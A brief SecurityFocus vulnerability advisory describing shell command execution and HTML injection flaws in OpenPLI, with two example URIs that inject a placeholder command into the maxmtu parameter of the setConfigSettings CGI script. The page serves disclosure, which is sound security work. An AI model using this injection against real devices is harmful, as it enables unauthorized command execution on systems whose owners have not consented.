OpenPLI Shell Command Execution and Multiple HTML Injection Vulnerabilities

Attackers can use a browser to exploit these issues.

The following example URIs and exploit code are available:

http://www.example.com/cgi-bin/setConfigSettings?maxmtu=%26COMMAND%26&hddstandby=2&hddacoustics=160&timeroffsetstart=0&timeroffsetstop=0&audiochannelspriority=&showsatpos=on&trustedhosts=&epgcachepath=%2Fhdd&epgsqlpath=%2Fvar%2Flib%2Fsqlite
http://www.example.com/cgi-bin/setConfigSettings?maxmtu=%26COMMAND%26


 

Privacy Statement
Copyright 2010, SecurityFocus